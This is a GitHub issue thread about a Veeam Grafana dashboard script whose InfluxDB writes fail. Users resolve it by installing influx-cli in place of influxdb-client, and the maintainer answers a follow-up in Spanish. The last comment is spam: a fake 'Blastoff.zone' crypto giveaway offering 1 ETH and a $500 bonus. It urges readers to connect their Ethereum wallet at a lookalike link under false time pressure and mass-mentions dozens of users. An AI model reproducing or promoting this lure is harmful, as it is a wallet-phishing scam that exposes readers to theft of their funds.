### ISSUE TITLE
Script returns an error

### ISSUE THREAD

**Issue by sinankizar** [jorgedlcruz/veeam-backup-and-replication-grafana#1]
Hello,

I have a Grafana instance working with not too many dashboards. Thanks to you we are successfully monitoring our vsphere environment. Now I thought I have to give your VBR dashboard a try too. I have edited the .sh with our details. but our .sh gives us below error. In your blog:

veeamJobSessions="1000"
veeamUsername="YOURVBRUSER"
veeamPassword="YOURVBRPASSWORD"
veeamBackupServer="YOURVBRAPIPORT"
veeamBackupPort="9419" #Default Port

But I thought "YOURVBRAPIPORT" should be our servers IP and edited accordingly

**Here is our details:**

Ubuntu 22.04.2 LTS / Grafana 9.5.2 / InfluxDBv2 / Telegraf 1.26.3 / jq installed

veeamInfluxDBURL="http://192.168.*.*" #Your InfluxDB Server, http://FQDN or https://FQDN if using SSL
veeamInfluxDBPort="8086" #Default Port
veeamInfluxDBBucket="veeam" # InfluxDB bucket name (not ID)
veeamInfluxDBToken="API_TOKEN_CREATED_FOR_veeam_BUCKET" # InfluxDB access token with read/write privileges for the bucket
veeamInfluxDBOrg="OUR_ORG" # InfluxDB organisation name (not ID)

veeamJobSessions="1000"
veeamUsername="DOMAIN\domain.admin"
veeamPassword="domain.admin_PASSWORD"
veeamBackupServer="192.168.*.*"
veeamBackupPort="9419" #Default Port

**And here is an error that I am getting for every  job I have created in VBR.** 

Writing veeam_vbr_backupobjects to InfluxDB
unknown arguments: write -t "API_TOKEN_CREATED_FOR_veeam_BUCKET" -b veeam -o MAT -p s veeam_vbr_backupobjects,veeamVBR=192.168.*.*,veeamVBRBobjectName=MAT-TR-VSPR,veeamVBRBobjecttype=VM,veeamVBRBobjectPlatform=VMware,veeamVBRBobjectviType=VirtualMachine,veeamVBRBobjectObjectId=vm-78001,veeamVBRBobjectPath=192.168.*.*\MAT-TR-DC001\192.168.*.*\MAT-TR-VSPR restorePointsCount=2
Usage of influx:
  -version
       Display the version and exit.
  -host 'host name'
       Host to connect to.
  -port 'port #'
       Port to connect to.
  -socket 'unix domain socket'
       Unix socket to connect to.
  -database 'database name'
       Database to connect to the server.
  -password 'password'
      Password to connect to the server.  Leaving blank will prompt for password (--password '').
  -username 'username'
       Username to connect to the server.
  -ssl
        Use https for requests.
  -unsafeSsl
        Set this when connecting to the cluster using https and not use SSL verification.
  -execute 'command'
       Execute command and quit.
  -format 'json|csv|column'
       Format specifies the format of the server responses:  json, csv, or column.
  -precision 'rfc3339|h|m|s|ms|u|ns'
       Precision specifies the format of the timestamp:  rfc3339, h, m, s, ms, u or ns.
  -consistency 'any|one|quorum|all'
       Set write consistency level: any, one, quorum, or all
  -pretty
       Turns on pretty print for the json format.
  -import
       Import a previous database export from file
  -pps
       How many points per second the import will allow.  By default it is zero and will not throttle importing.
  -path
       Path to file to import
  -compressed
       Set to true if the import file is compressed

Examples:

    # Use influx in a non-interactive mode to query the database "metrics" and pretty print json:
    $ influx -database 'metrics' -execute 'select * from cpu' -format 'json' -pretty

    # Connect to a specific database on startup and set database context:
    $ influx -database 'metrics' -host 'localhost' -port '8086'

**Comment by sinankizar** [comment]
I have edited my first question. Looks like I am getting the veeam info but I am experiencing a problem with writing to veeam bucket with the commands in the script.  Looks like I am just a step away from my perfect dashboard :) Please help me on this. Thanks in advance.

**Comment by sinankizar** [comment]
Thank you so much for everything you have done for grafana dashboards,
Finally I have managed to get it work. I have uninstalled the infloxdb-client and installed influx-cli and after this step everything is working as it should.

Thanks again :)

**Comment by jorgedlcruz** [comment]
Thank you so much!!! Sorry I've missed the comments here, gmail didn't sent me any email.

Will add those requirements and fix typo to the document :)

**Comment by leandrotorres17** [comment]
Hola Jorge, muchas gracias por tus aportes a la comunidad. Estoy teniendo el mismo error en un entorno desplegado en K8s. He desinstalado influxdb-client pero persiste el problema. Recomiendas instalar un Linux y aplicar la solución de sinankizar o piensas en otra solución?  Gracias!!

**Comment by jorgedlcruz** [comment]
Nunca me ha pasado, no importa que tengas todo en Kubernetes, el .SH desde donde lo ejecutas? Desde un Linux verdad? Ahi es donde tienes que tener instalado influx cli: https://docs.influxdata.com/influxdb/cloud/tools/influx-cli/?t=Linux

No me he encontrado con el problema nunca, aqui algunos ejemplos para que veas si puedes escribir informacion usando el comando
https://docs.influxdata.com/influxdb/cloud/reference/cli/influx/write/

**Comment by MatMarrr** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
45H, @xuxuewen, @leopoldjoy, @martemorfosis, @Helton-Santos, @lifengtian, @SambitAcharya, @baituhuangyu, @Pozzoooo, @rosspb3, @craca, @marquesVF, @harrya, @saddammohd941, @pawelzar, @pokearu, @adampats, @jaylenw, @dtrain112358, @mutouyuguo, @retrobeeps, @ymleelab, @chenkel, @tobydoescode, @skabba, @craigiansmith, @reezzyy, @IronPlus, @gms-ta-koge, @mhhk2012, @runswithd6s, @jeroenherczeg, @zhuima, @motorcityadam, @perpetual-hydrofoil, @cdkkim, @dabigc, @varas, @ygw365, @ryantenney, @mzramna, @pauloeli, @vidrine, @rdmurphy, @erdii, @DeividasJackus, @jb-systems, @kkpan11, @leonongkeko, @SHINE1607
